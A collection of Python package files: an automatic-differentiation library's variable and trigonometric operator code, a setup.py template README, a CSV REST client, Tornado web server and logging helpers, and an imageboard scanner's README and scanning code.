# Two cases to "merge" the .derivative from the forward propagation and ._bpgrad from the back propagation
# if self.derivative is not None, two possible cases:
# 1. For target vars like x,y whose .derivative is initialized when declared;
# 2. For mix mode calculation, some node in forward mode in the trace has non-empty .derivative
# Be careful, the merged derivative could be part of the total derivative so we need to accumulate all.
if len(self.derivative) > 0:
from pyautodiff import Ops
# f: a var instance, dfdc: numerical derivative for dfdc (suppose current instance(self) is c)
f, dfdc = self._bpgrad.popitem()
# Merge two 4D matrix
d = Ops.merge_fwd_backprop(self.derivative, dfdc)
# Accumulate the derivatives
f.derivative = Counter(f.derivative)
f.derivative.update(d)
f.derivative = dict(f.derivative)
elif self._context is not None:
cls, operands = self._context
cls.backprop(operands[0],
operands[1] if len(operands) == 2 else None,
self.val,
self._bpgrad)
# Clear it for next BP
self._bpgrad.popitem()
for t in operands:
t._degree -= 1
# When t.degree is 0, dfdt is complete and safe to trace back
if t._degree == 0:
t._backward()
def _reverse_diff(self):
"""
Start AD of reverse mode.
"""
degrees = self._count_degrees()
for t in degrees:
t._degree = degrees[t]
t._bpgrad = Counter()
self._bpgrad = {self: self._init_seed(self.val)}
self._backward()
def diff(self, wrts=None, return_raw=False):
"""
Get derivative w.r.t. to each var in `wrts`.
Args:
wrts: single variable name or a list/tuple of variable names. Defaults to None, equals to `all`.
Returns:
a Number or np.ndarray if wrts is single variable name;
or a list of Number or np.ndarray that corresponds to each variable name in wrts, if wrts is a list/tuple;
or a dict with the variable name as a key and value as a Number or np.ndarray, if wrts is None.
"""
# Reverse mode
if len(self.derivative) == 0 and self._context is not None:
self._reverse_diff()
der = self.derivative
keys = list(der.keys())
if not return_raw:
der = {x: self._squeeze_der(x, der[x]) for x in keys}
if wrts is None:
if len(keys) == 0:
return 0
if len(keys) == 1:
return der[keys[0]]
return der
elif isinstance(wrts, (list, tuple)):
return [der.get(w, 0) for w in wrts]
else:
try:
return der[wrts]
except:
raise TypeError(f"wrts only supports None/list/tuple or a var name!")
@property
def T(self):
"""
To support x.T
Returns: Transposed matrix
"""
return self.transpose()
@property
def is_const(self):
"""Const like: Var(1)"""
return self._var_shapes is None
class VarAutoName(Var):
"""
A wrapper class for class `Var`. Variable names are auto-generated by combining the current number of
instances of `VarAutoName` and system process time to avoid duplicate names.
"""
def __init__(self, val, derivative=None, mode=Mode.Forward):
"""
Args:
val (Number or np.ndarray): numerical value; same as `val` in `Var`.
derivative: a dict or a Number/np.ndarray. Defaults to None. Same as `derivative` in `Var`.
"""
# TODO: Fan
# Add a Lock to protect G_VAR_AUTO_NAME_NUM
global G_VAR_AUTO_NAME_NUM
G_VAR_AUTO_NAME_NUM += 1
name = f"{G_VAR_AUTO_NAME_NUM}_{time.process_time()}"
super().__init__(val, name=name, derivative=derivative, mode=mode)
@staticmethod
def clear_var_counter():
"""
Clears G_VAR_AUTO_NAME_NUM in case of overflow.
Returns: None
"""
global G_VAR_AUTO_NAME_NUM
G_VAR_AUTO_NAME_NUM = 0 | 4dpyautodiff | /4dpyautodiff-1.0.0.tar.gz/4dpyautodiff-1.0.0/pyautodiff/var.py | var.py |
import numpy as np
from pyautodiff import Var, Ops
from pyautodiff.ops import _dunder_wrapper
class VarSin(Ops):
"""
A class for trigonometric sine operation. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> sin(Var(0, 'x'))
(<class 'pyautodiff.var.Var'> name: None val: 0.0, der: {'x': array([[[[1.]]]])})
"""
@classmethod
def op(cls, va, vb):
return np.sin(va)
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
return np.cos(va)
class VarCos(Ops):
"""
A class for trigonometric cosine operation. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> cos(Var(0, 'x'))
(<class 'pyautodiff.var.Var'> name: None val: 1.0, der: {'x': array([[[[0.]]]])})
"""
@classmethod
def op(cls, va, vb):
return np.cos(va)
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
return -np.sin(va)
class VarTan(Ops):
"""
A class for trigonometric tangent operation. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> tan(Var(0, 'x'))
(<class 'pyautodiff.var.Var'> name: None val: 0.0, der: {'x': array([[[[1.]]]])})
"""
@classmethod
def op(cls, va, vb):
return np.tan(va)
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
return (1 / np.cos(va)) ** 2
class VarArcSin(Ops):
"""
A class for trigonometric arcsine operation. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> arcsin(Var(0, 'x'))
(<class 'pyautodiff.var.Var'> name: None val: 0.0, der: {'x': array([[[[1.]]]])})
"""
@classmethod
def op(cls, va, vb):
return np.arcsin(va)
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
return 1 / np.sqrt(1 - va ** 2)
class VarArcCos(Ops):
"""
A class for trigonometric arccosine operation. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> arccos(Var(0, 'x'))
(<class 'pyautodiff.var.Var'> name: None val: 1.5707963267948966, der: {'x': array([[[[-1.]]]])})
"""
@classmethod
def op(cls, va, vb):
return np.arccos(va)
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
return -1 / np.sqrt(1 - va ** 2)
class VarArcTan(Ops):
"""
A class for trigonometric arctangent operation. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> arctan(Var(0, 'x'))
(<class 'pyautodiff.var.Var'> name: None val: 0.0, der: {'x': array([[[[1.]]]])})
"""
@classmethod
def op(cls, va, vb):
return np.arctan(va)
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
return 1 / (1 + va ** 2)
class VarSinH(Ops):
"""
A class for trigonometric hyperbolic sine operation. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> arcsinh(Var(0, 'x'))
(<class 'pyautodiff.var.Var'> name: None val: 0.0, der: {'x': array([[[[1.]]]])})
"""
@classmethod
def op(cls, va, vb):
return np.sinh(va)
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
""" derivative of sinh(x) = cosh(x)"""
return np.cosh(va)
class VarCosH(Ops):
"""
A class for trigonometric hyperbolic cosine operation. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> arccosh(Var(2, 'x'))
(<class 'pyautodiff.var.Var'> name: None val: 1.3169578969248166, der: {'x': array([[[[0.57735027]]]])})
"""
@classmethod
def op(cls, va, vb):
return np.cosh(va)
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
""" derivative of cosh(x) = sinh(x)"""
return np.sinh(va)
class VarTanH(Ops):
"""
A class for trigonometric hyperbolic tangent operation. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> tanh(Var(1, 'x'))
(<class 'pyautodiff.var.Var'> name: None val: 0.7615941559557649, der: {'x': array([[[[0.41997434]]]])})
"""
@classmethod
def op(cls, va, vb):
return np.tanh(va)
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
""" derivative of tanh(x) = 1 - tanh(x)^2
Args:
**kwargs:
"""
return 1 - np.tanh(va) ** 2
class VarArcSinH(Ops):
"""
A class for trigonometric hyperbolic arcsine operation. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> arcsinh(Var(0, 'x'))
(<class 'pyautodiff.var.Var'> name: None val: 0.0, der: {'x': array([[[[1.]]]])})
"""
@classmethod
def op(cls, va, vb):
return np.arcsinh(va)
@classmethod
def local_derivative(cls, va, vb, vc):
""" for all real va """
return 1 / np.sqrt((va ** 2) + 1)
class VarArcCosH(Ops):
"""
A class for trigonometric hyperbolic arccosine operation. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> arccosh(Var(2, 'x'))
(<class 'pyautodiff.var.Var'> name: None val: 1.3169578969248166, der: {'x': array([[[[0.57735027]]]])})
"""
@classmethod
def op(cls, va, vb):
return np.arccosh(va)
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
""" for all real va>1
Args:
**kwargs:
"""
assert (va > 1), "va should be greater than 1."
return 1 / np.sqrt((va ** 2) - 1)
class VarArcTanH(Ops):
"""
A class for trigonometric hyperbolic arctan operation. Gives the value and local derivative.
This class inherits from the Ops Class.
>>> arctanh(Var(0, 'x'))
(<class 'pyautodiff.var.Var'> name: None val: 0.0, der: {'x': array([[[[1.]]]])})
"""
@classmethod
def op(cls, va, vb):
""" the domain of arctanh is (-1, 1) """
assert (np.abs(va) < 1), "The value inside arctanh should be between (-1, 1)."
return np.arctanh(va)
@classmethod
def local_derivative(cls, va, vb, vc, **kwargs):
""" derivative of arctanh(x) = 1 / (1-x^2)
Args:
**kwargs:
"""
return 1 / (1 - va ** 2)
sin = VarSin.unary_operation # enable sin(x)
Var.sin = _dunder_wrapper(sin, True) # enable x.sin()
arcsin = VarArcSin.unary_operation
Var.arcsin = _dunder_wrapper(arcsin, True)
cos = VarCos.unary_operation
Var.cos = _dunder_wrapper(cos, True)
arccos = VarArcCos.unary_operation
Var.arccos = _dunder_wrapper(arccos, True)
tan = VarTan.unary_operation
Var.tan = _dunder_wrapper(tan, True)
arctan = VarArcTan.unary_operation
Var.arctan = _dunder_wrapper(arctan, True)
sinh = VarSinH.unary_operation
Var.sinh = _dunder_wrapper(sinh, True)
arcsinh = VarArcSinH.unary_operation
Var.arcsinh = _dunder_wrapper(arcsinh, True)
cosh = VarCosH.unary_operation
Var.cosh = _dunder_wrapper(cosh, True)
arccosh = VarArcCosH.unary_operation
Var.arccosh = _dunder_wrapper(arccosh, True)
tanh = VarTanH.unary_operation
Var.tanh = _dunder_wrapper(tanh, True)
arctanh = VarArcTanH.unary_operation
Var.arctanh = _dunder_wrapper(arctanh, True) | 4dpyautodiff | /4dpyautodiff-1.0.0.tar.gz/4dpyautodiff-1.0.0/pyautodiff/trig_ops.py | trig_ops.py |
📦 setup.py (for humans)
=======================
This repo exists to provide [an example setup.py] file, that can be used
to bootstrap your next Python project. It includes some advanced
patterns and best practices for `setup.py`, as well as some
commented–out nice–to–haves.
For example, this `setup.py` provides a `$ python setup.py upload`
command, which creates a *universal wheel* (and *sdist*) and uploads
your package to [PyPi] using [Twine], without the need for an annoying
`setup.cfg` file. It also creates/uploads a new git tag, automatically.
In short, `setup.py` files can be daunting to approach, when first
starting out — even Guido has been heard saying, "everyone cargo cults
thems". It's true — so, I want this repo to be the best place to
copy–paste from :)
[Check out the example!][an example setup.py]
Installation
-----
```bash
cd your_project
# Download the setup.py file:
# download with wget
wget https://raw.githubusercontent.com/navdeep-G/setup.py/master/setup.py -O setup.py
# download with curl
curl -O https://raw.githubusercontent.com/navdeep-G/setup.py/master/setup.py
```
To Do
-----
- Tests via `$ setup.py test` (if it's concise).
Pull requests are encouraged!
More Resources
--------------
- [What is setup.py?] on Stack Overflow
- [Official Python Packaging User Guide](https://packaging.python.org)
- [The Hitchhiker's Guide to Packaging]
- [Cookiecutter template for a Python package]
License
-------
This is free and unencumbered software released into the public domain.
Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any means.
[an example setup.py]: https://github.com/navdeep-G/setup.py/blob/master/setup.py
[PyPi]: https://docs.python.org/3/distutils/packageindex.html
[Twine]: https://pypi.python.org/pypi/twine
[image]: https://farm1.staticflickr.com/628/33173824932_58add34581_k_d.jpg
[What is setup.py?]: https://stackoverflow.com/questions/1471994/what-is-setup-py
[The Hitchhiker's Guide to Packaging]: https://the-hitchhikers-guide-to-packaging.readthedocs.io/en/latest/creation.html
[Cookiecutter template for a Python package]: https://github.com/audreyr/cookiecutter-pypackage
| 4in | /4in-0.1.0.tar.gz/4in-0.1.0/README.md | README.md |
import requests
def call_csv_endpoint(
endopint_url: str,
csv_input_file_name: str,
call_timeout: int = 15,
):
"""Receive CSV input and send it to a microservice HTTP endpoint, then return all data collection from json result"""
with open(csv_input_file_name, encoding="utf-8") as csv_file:
files = {"file": ("input_data.csv", csv_file, "text/csv")}
response_from_api = requests.post(
endopint_url, timeout=call_timeout, files=files
)
# raise error if there was a problem calling the endpoint
response_from_api.raise_for_status()
# read result as json
result = response_from_api.json()
# count number of business exceptions
b_exceptions = result["data_collection"]["businessExceptions"]
b_exceptions_data = []
for b_excep in b_exceptions:
b_exceptions_data.append({"exception_comment": b_excep["exceptionComment"]})
# read names of additional data sets
data_sets = result["data_collection"]["resultAdditionalData"]
data_sets_names = []
# data_sets_results = []
for d_set in data_sets:
data_set_name = d_set["inputFormatName"]
data_sets_names.append(data_set_name)
# get data set rows
# input_object = d_set["inputObject"]
# for ikey in input_object.keys():
# data_sets_results.append({data_set_name: input_object[ikey]})
# prepare information to return
result_data = {
"business_exceptions_quantity": len(b_exceptions),
"business_exceptions_data": b_exceptions_data,
"data_sets_names": data_sets_names,
# "data_sets_results": data_sets_results,
}
return result_data
def call_csv_endpoint_read_data_set(
endopint_url: str,
csv_input_file_name: str,
data_set_name_to_return: str,
call_timeout: int = 15,
):
"""Receive CSV input and send it to a microservice HTTP endpoint, then return all data collection from json result"""
with open(csv_input_file_name, encoding="utf-8") as csv_file:
files = {"file": ("input_data.csv", csv_file, "text/csv")}
response_from_api = requests.post(
endopint_url, timeout=call_timeout, files=files
)
# raise error if there was a problem calling the endpoint
response_from_api.raise_for_status()
# read result as json
result = response_from_api.json()
# read names of additional data sets
data_sets = result["data_collection"]["resultAdditionalData"]
for d_set in data_sets:
data_set_name = d_set["inputFormatName"]
if data_set_name == data_set_name_to_return:
input_object = d_set["inputObject"]
for ikey in input_object.keys():
return input_object[ikey]
# if reach this point the data set name was not found
return {} | 4logik-python-rest-client | /4logik-python-rest-client-1.0.4.tar.gz/4logik-python-rest-client-1.0.4/py4logik_python_rest_client/endpoint_caller.py | endpoint_caller.py |
import json
import os
import inspect
from tornado.ioloop import IOLoop
from tornado.web import RequestHandler, Application
from tornado.websocket import WebSocketHandler
from _4helper import _4ssert
class WebServer:
@classmethod
def parse_ip_port(cls, ip_port):
if isinstance(ip_port, int) or ":" not in ip_port:
return "127.0.0.1", int(ip_port)
else:
ip, port = ip_port.split(":")
return ip, int(port)
@classmethod
def start(cls, config):
ip = config.get("ip", "127.0.0.1")
port = int(config.get("port", "80"))
routes = config.get("routes", {"/": cls})
class _WebSocketHandler(WebSocketHandler):
async def open(self, *args, **kwargs):
print(f"open {args} {kwargs}")
async def on_close(self):
print("close")
async def on_message(self, message):
print(f"handling {message}")
self.write_message(f"got {message}")
class _Handler(RequestHandler):
SUPPORTED_METHODS = ["GET", "POST"]
async def get(self):
await self.handle()
async def post(self):
await self.handle(True)
async def handle(self, is_post=False):
match_handler = None
max_match_length = 0
for path, handler in routes.items():
if self.request.path.startswith(path):
match_length = len(path)
if match_length > max_match_length:
max_match_length = match_length
match_handler = handler
if match_handler is None:
self.set_status(404)
self.finish()
return
func_name = "handle_%s" % self.request.path[max_match_length:]
func = getattr(match_handler, func_name, None)
if func is None:
self.set_status(404)
self.finish()
return
if self.request.arguments:
request = dict(
(i, j[0].decode()) for i, j in self.request.arguments.items()
)
else:
request = json.loads(self.request.body or "{}")
request = dict((i, str(j)) for i, j in request.items())
func_parameters = inspect.signature(func).parameters
for key, value in (
("headers", self.request.headers),
("body", self.request.body),
):
_4ssert(key not in request)
if key in func_parameters:
request[key] = value
response = await func(**request)
if isinstance(response, dict):
self.write(json.dumps(response))
else:
self.write(response)
self.finish()
Application(
[(r"/websocket", _WebSocketHandler), (r".*", _Handler,)],
static_path=os.path.join(os.getcwd(), "static"),
).listen(port, address=ip)
IOLoop.current().start() | 4quila | /4quila-0.36.200302-py3-none-any.whl/_4server/web.py | web.py |
import json
import os
import inspect
from tornado.ioloop import IOLoop
from tornado.web import RequestHandler, Application
from tornado.websocket import WebSocketHandler
from _4helper import _4ssert
class _WebSocketHandler(WebSocketHandler):
async def open(self, *args, **kwargs):
print(f"open {args} {kwargs}")
async def on_close(self):
print("close")
async def on_message(self, message):
print(f"handling {message}")
self.write_message(f"got {message}")
class _Handler(RequestHandler):
SUPPORTED_METHODS = ["GET", "POST"]
def initialize(self, routes):
self.routes = routes #pylint: disable=attribute-defined-outside-init
async def get(self):
await self.handle()
async def post(self):
await self.handle()
async def handle(self):
match_handler = None
max_match_length = 0
for path, handler in self.routes.items():
if self.request.path.startswith(path):
match_length = len(path)
if match_length > max_match_length:
max_match_length = match_length
match_handler = handler
if match_handler is None:
self.set_status(404)
self.finish()
return
func_name = "handle_%s" % self.request.path[max_match_length:]
func = getattr(match_handler, func_name, None)
if func is None:
self.set_status(404)
self.finish()
return
if self.request.arguments:
request = dict(
(i, j[0].decode()) for i, j in self.request.arguments.items()
)
else:
request = json.loads(self.request.body or "{}")
request = dict((i, str(j)) for i, j in request.items())
func_parameters = inspect.signature(func).parameters
for key, value in (
("headers", self.request.headers),
("body", self.request.body),
):
_4ssert(key not in request)
if key in func_parameters:
request[key] = value
response = await func(**request)
if isinstance(response, dict):
self.write(json.dumps(response))
else:
self.write(response)
self.finish()
def start(settings):
ip = settings.pop("ip", "127.0.0.1")
port = int(settings.pop("port"))
Application(
[
(r"/websocket", _WebSocketHandler),
(r".*", _Handler, {"routes": settings.pop("routes", {})}),
],
static_path=os.path.join(os.getcwd(), "static"),
).listen(port, address=ip)
IOLoop.current().start() | 4quila | /4quila-0.36.200302-py3-none-any.whl/_4server/__init__.py | __init__.py |
import time
import json
from functools import wraps
from random import randint
from .common import logger, format_stacks
def tracer(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
log_id = randint(0, 100000)
start_time = time.time()
def _time():
# return '%0.4f' % (time.time() - start_time)
return "%sms" % int((time.time() - start_time) * 1000)
def _log(lines):
lines = (
["", "<<< trace_%s <<<<<<<<<<<" % log_id]
+ [" %s" % line for line in lines]
+ [">>> trace_%s >>>>>>>>>>>" % log_id, ""]
)
logger.info("\n".join(lines))
def _json(result, header=" " * 4):
if isinstance(result, dict):
return "\n".join(
"%s%s" % (header, i)
for i in json.dumps(result, indent=4).splitlines()
)
else:
try:
assert isinstance(result, str)
return "\n".join(
"%s%s" % (header, i)
for i in json.dumps(json.loads(result), indent=4).splitlines()
)
except Exception:
return result
if (
len(args) >= 3
and hasattr(args[1], "method")
and hasattr(args[1], "path")
and hasattr(args[2], "dict")
):
mode = "DJANGO_HANDLER"
else:
mode = ""
def _log_input():
if mode == "DJANGO_HANDLER":
return "%s:%s %s" % (args[1].method, args[1].path, args[2].dict())
else:
return "<----< %s %s" % (
" ".join(str(i) for i in args),
" ".join("%s:%s" % (k, v) for k, v in kwargs.items()),
)
def _log_output():
if mode == "DJANGO_HANDLER":
return "%s %s -> %s" % (
_time(),
result.status_code,
_json(result.content.decode("utf-8")),
)
else:
return ">----> %s" % _json(result)
_log([_log_input()])
try:
result = fn(*args, **kwargs)
except Exception:
_log([_log_input(),] + list(format_stacks()))
raise
else:
_log(
[_log_input(), _log_output(),]
)
return result
return wrapper | 4quila | /4quila-0.36.200302-py3-none-any.whl/_4quila/tracer.py | tracer.py |
import contextlib
import requests
import json
from .common import logger
class Session:
def __init__(self, domain, cookies=None, headers=None):
self._session = requests.session()
self.domain = domain
self.cookies = cookies or {}
self.headers = headers or {}
if "User-Agent" not in self.headers:
self.headers["User-Agent"] = (
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,"
" like Gecko) Ubuntu Chromium/69.0.3497.81 Chrome/69.0.3497.81 Safari/537.36"
)
def close(self):
self._session.close()
def _request(self, method, path, params=None, data=None, headers=None):
params = params or {}
data = data or {}
headers = headers or {}
logger.info(
"%s ing %s" % (method, self.domain + path,)
+ (" params %s" % params if params else "")
+ (" data %s" % data if data else "")
+ (" headers %s" % headers if headers else "")
)
headers.update(self.headers)
response = self._session.request(
method,
self.domain + path,
data=json.dumps(data),
params=params,
cookies=self.cookies,
headers=headers,
)
try:
response_json = response.json()
logger.info("responding json:\n%s" % json.dumps(response_json, indent=4))
return response_json
except Exception:
logger.info("responding text:\n%s" % ("".join(response.text.splitlines())))
return response.text
def get(self, path, params=None, headers=None):
return self._request("GET", path, params=params, headers=headers)
def post(self, path, data=None, headers=None):
return self._request("POST", path, data=data, headers=headers)
def head(self, path, params=None, headers=None):
return self._request("HEAD", path, params=params, headers=headers)
@contextlib.contextmanager
def session(domain, cookies=None, headers=None):
_session = Session(domain, cookies=cookies, headers=headers)
yield _session
_session.close() | 4quila | /4quila-0.36.200302-py3-none-any.whl/_4quila/browser.py | browser.py |
from tornado.web import RequestHandler, Application
from tornado.websocket import WebSocketHandler
import json
import os
import inspect
from . import loop
def parse_ip_port(ip_port):
if isinstance(ip_port, int) or ":" not in ip_port:
return "127.0.0.1", int(ip_port)
else:
ip, port = ip_port.split(":")
return ip, int(port)
def http(ip_port, handlers=None):
class _WebSocketHandler(WebSocketHandler):
async def open(self, *args, **kwargs):
print(f"open {args} {kwargs}")
async def on_close(self):
print("close")
async def on_message(self, message):
print(f"handling {message}")
self.write_message(f"got {message}")
class _Handler(RequestHandler):
SUPPORTED_METHODS = ["GET", "POST"]
async def get(self):
await self.handle()
async def post(self):
await self.handle(True)
async def handle(self, is_post=False):
match_handler = None
max_match_length = 0
for path, handler in handlers.items():
if self.request.path.startswith(path):
match_length = len(path)
if match_length > max_match_length:
max_match_length = match_length
match_handler = handler
if match_handler is None:
self.set_status(404)
self.finish()
return
func_name = "handle_%s" % self.request.path[max_match_length:]
func = getattr(match_handler, func_name, None)
if func is None:
self.set_status(404)
self.finish()
return
if self.request.arguments:
request = dict(
(i, j[0].decode()) for i, j in self.request.arguments.items()
)
else:
request = json.loads(self.request.body or "{}")
request = dict((i, str(j)) for i, j in request.items())
if "headers" in inspect.signature(func).parameters:
response = await func(**request, headers=self.request.headers)
else:
response = await func(**request)
if isinstance(response, dict):
self.write(json.dumps(response))
else:
self.write(response)
self.finish()
ip, port = parse_ip_port(ip_port)
Application(
[(r"/websocket", _WebSocketHandler), (r".*", _Handler,)],
static_path=os.path.join(os.getcwd(), "static"),
).listen(port, address=ip)
loop.start() | 4quila | /4quila-0.36.200302-py3-none-any.whl/_4quila/server.py | server.py |
# 4scanner [![Build Status](https://travis-ci.org/pboardman/4scanner.svg?branch=master)](https://travis-ci.org/pboardman/4scanner)
![4scanner logo](logo/4scanner128.png)
4scanner can search multiple imageboards threads for matching keywords then download all images to disk.
## Supported imageboards
- 4chan
- lainchan
- uboachan
You can create an issue if you want to see other imageboards supported
## Installing
` pip3 install 4scanner `
(4scanner is ONLY compatible with python3+)
For Arch Linux there is an [AUR package](https://aur.archlinux.org/packages/4scanner/)
## Running via Docker
Create a config (detail below), name it config.json and drop it where you would like to download the images. Then run a container:
`docker run -v /can/be/anywhere:/output -v /anywhere/else:/root/.4scanner lacsap/4scanner`
`/can/be/anywhere` Can be anywhere on your computer, images will be downloaded there (This is the directory where you need to put the config.json)
`/anywhere/else` Can be anywhere on your computer, it will contain the sqlite3 database 4scanner use to keep track of downloaded threads and duplicate
## How to
the first thing you need to do is create a simple json file with the directories names
you want, the boards you want to search and the keywords.
(see the json file section for more details)
After your json file is done you can start 4scanner with:
` 4scanner file.json `
it will search all threads for the keywords defined in your json file and
download all images/webms from threads where a keyword is found. (In the current directory unless you specify one with -o )
## Creating your JSON file via the 4genconf script (easy)
The `4genconf` utility is now installed as of 4scanner 1.5.1. This utility will ask you simple questions about what you want to download and generate a configuration file for you!
## Creating your JSON file manually
Creating the JSON file is easy, you can use the example.json file as a base.
Your "Searches" are what 4scanner use to know which board to check for what keywords and the name of the folder where it needs to download the images, you can have as many "Searches" as you want.
Here is an example of what the JSON file should look like:
```json
{"searches":[
{
"imageboard": "IMAGEBOARD",
"folder_name": "YOUR_FOLDER_NAME",
"board": "BOARD_LETTER",
"keywords": ["KEYWORD1", "KEYWORD2"]
},
{
"imageboard": "4chan",
"folder_name": "vidya",
"board": "v",
"keywords": ["tf2", "splatoon", "world of tank"]
}
]}
```
## Search options
4scanner has a lot of options for downloading only the images you want. Such as downloading only images with a certain width or height, or only images with a certain extension.
To see all available options with examples check out: [OPTIONS.md](OPTIONS.md)
[Hydrus Network](https://hydrusnetwork.github.io/hydrus/) users: check out the `tag` [option](OPTIONS.md) to automatically tag your images on import
- Example with all optional options
```json
{"searches":[
{
"imageboard": "4chan",
"folder_name": "vidya",
"board": "v",
"width": ">1000",
"height": ">1000",
"filename": "IMG_",
"extension": [".jpg", ".png"],
"tag": ["game"],
"keywords": ["tf2", "splatoon", "world of tank"],
"check_duplicate": true,
"subject_only": false
}
]}
```
This will download images bigger than 1000x1000 which are .jpg or .png with a filename containing ``` IMG_ ```
## Notes
- the keywords search is case insensitive
## 4downloader
4downloader is also installed with 4scanner and can be use to download
a single thread like this:
``` 4downloader http://boards.4chan.org/b/thread/373687492 ```
It will download all images until the thread die.
You can also download threads from imageboards other than 4chan with ```-i```
| 4scanner | /4scanner-1.6.3.tar.gz/4scanner-1.6.3/README.md | README.md |
import time
import json
import os
import re
from scanner import downloader, imageboard_info
from scanner.config import DB_FILE, currently_downloading
import sqlite3
import subprocess
import urllib.request
import threading
import http.client
class thread_scanner:
def __init__(self, keywords_file:str, output:str, quota_mb:int, wait_time:int, logger):
"""
Using the keyword file passed as a paramater to 4scanner,
thread_scanner will search multiple threads and imageboards
and launch the download of a thread if a keyword is found in first post of the thread.
Use scan() to start the scan.
Args:
keywords_file: path of file containing whats imageboard to search as JSON (see README for more info)
output: The output directory where the pictures will be downloaded
quota_mb: stop 4scanner after quota_mb MB have been downloaded
throttle: Time to wait, in second, between image downloads
wait_time: number of time to wait between scans
"""
self.keywords_file = keywords_file
self.output = output
self.quota_mb = quota_mb
self.wait_time = wait_time
self.logger = logger
def get_catalog_json(self, board:str, chan:str):
"""
Get the catalog of a given imageboards board as a JSON
Return:
catalog info as a dict
"""
chan_base_url = imageboard_info.imageboard_info(chan).base_url
catalog = urllib.request.urlopen(
"{0}{1}/catalog.json".format(chan_base_url, board))
try:
catalog_data = catalog.read()
except http.client.IncompleteRead as err:
catalog_data = err.partial
return json.loads(catalog_data.decode("utf8"))
def scan_thread(self, keyword:str, catalog_json:str, subject_only:str, wildcard:str):
"""
Check each thread, threads who contains the keyword are returned
Args:
keyword: A keyword to search for. Example: "moot"
catalog_json: A dict of a board catalog, as returned by get_catalog_json()
subject_only: Search only withing the subject of the thread, as oposed to searching the subject and first post
Returns:
a list of threads number that matched the keyword
"""
matched_threads = []
for i in range(len(catalog_json)):
for thread in catalog_json[i]["threads"]:
if wildcard == "all":
regex = r'{0}'.format(keyword)
# Search thread subject
if 'sub' in thread:
if re.search(regex, str(thread["sub"]), re.IGNORECASE):
matched_threads.append(thread["no"])
if not subject_only:
# Search OPs post body
if 'com' in thread:
if re.search(regex, str(thread["com"]), re.IGNORECASE):
matched_threads.append(thread["no"])
elif wildcard == "start":
regex = r'\b{0}'.format(keyword)
# Search thread subject
if 'sub' in thread:
if re.search(regex, str(thread["sub"]), re.IGNORECASE):
matched_threads.append(thread["no"])
if not subject_only:
# Search OPs post body
if 'com' in thread:
if re.search(regex, str(thread["com"]), re.IGNORECASE):
matched_threads.append(thread["no"])
else:
regex = r'\b{0}\b'.format(keyword)
# Search thread subject
if 'sub' in thread:
if re.search(regex, str(thread["sub"]), re.IGNORECASE):
matched_threads.append(thread["no"])
if not subject_only:
# Search OPs post body
if 'com' in thread:
if re.search(regex, str(thread["com"]), re.IGNORECASE):
matched_threads.append(thread["no"])
return matched_threads
def download_thread(self, thread_id:int, chan:str, board:str, folder:str, output:str, condition:dict, dupe_check:bool, tag_list:list, throttle:int):
"""
Create a downloader object with the info passed as paramater and start the download of in a new thread.
"""
thread_downloader = downloader.downloader(thread_id, board,chan, output, folder, True, condition, dupe_check, tag_list, throttle, self.logger)
t = threading.Thread(target=thread_downloader.download)
t.daemon = True
t.start()
def dir_size_mb(self, directory):
"""
Check the size of a directory in MB.
Args:
directory: the path to a directory
Returns:
Size of the directory in MB
"""
total_size = 0
for dirpath, dirnames, filenames in os.walk(directory):
for f in filenames:
fp = os.path.join(dirpath, f)
total_size += os.path.getsize(fp)
return total_size / 1000000
def check_quota(self):
"""
Stop 4scanner of the download quota was reached.
"""
if int(self.quota_mb) < dir_size_mb(os.path.join(self.output, "downloads")):
self.logger.info("Quota limit exceeded. Stopping 4scanner.")
exit(0)
def get_check_duplicate(self, search):
"""
Check whether to activate the check duplicate feature
Returns:
True if we need to activate it, False otherwise
"""
if 'check_duplicate' in search:
if search['check_duplicate']:
return True
else:
return False
# duplicate check is on by default
return True
def get_condition(self, search:dict):
"""
Get all search condition from a search
Returns:
All search conditions as a dict
"""
condition = {}
if 'extension' in search:
condition["ext"] = []
if isinstance(search['extension'], str):
condition["ext"].append(search['extension'])
else:
for extension in search['extension']:
condition["ext"].append(extension)
else:
condition["ext"] = False
if 'filename' in search:
condition["filename"] = []
if isinstance(search['filename'], str):
condition["filename"].append(search['filename'])
else:
for extension in search['filename']:
condition["filename"].append(extension)
else:
condition["filename"] = False
if 'width' in search:
condition["width"] = search['width']
else:
condition["width"] = False
if 'height' in search:
condition["height"] = search['height']
else:
condition["height"] = False
return condition
def get_imageboard(self, search:dict):
"""
get imageboard from a search
Returns:
imageboard_info object of an imageboard
"""
if 'imageboard' in search:
chan = search["imageboard"]
# will raise error if not supported
imageboard_info.imageboard_info(chan)
else:
# default
chan = "4chan"
return chan
def get_tag_list(self, search):
"""
get all tags from a search
Returns:
a list containing all tags or None
"""
if 'tag' in search:
tag = search["tag"]
else:
tag = None
return tag
def get_subject_only(self, search):
"""
Check whether to search only the subject of post for a given search.
Returns:
True to get subject only, False otherwise
"""
if 'subject_only' in search:
subject_only = search["subject_only"]
else:
subject_only = None
return subject_only
def get_wildcard(self, search):
"""
Check whether to search only the subject of post for a given search.
Returns:
True to get subject only, False otherwise
"""
if 'wildcard' in search:
wildcard = search["wildcard"]
else:
wildcard = None
return wildcard
def get_keyword(self, search):
"""
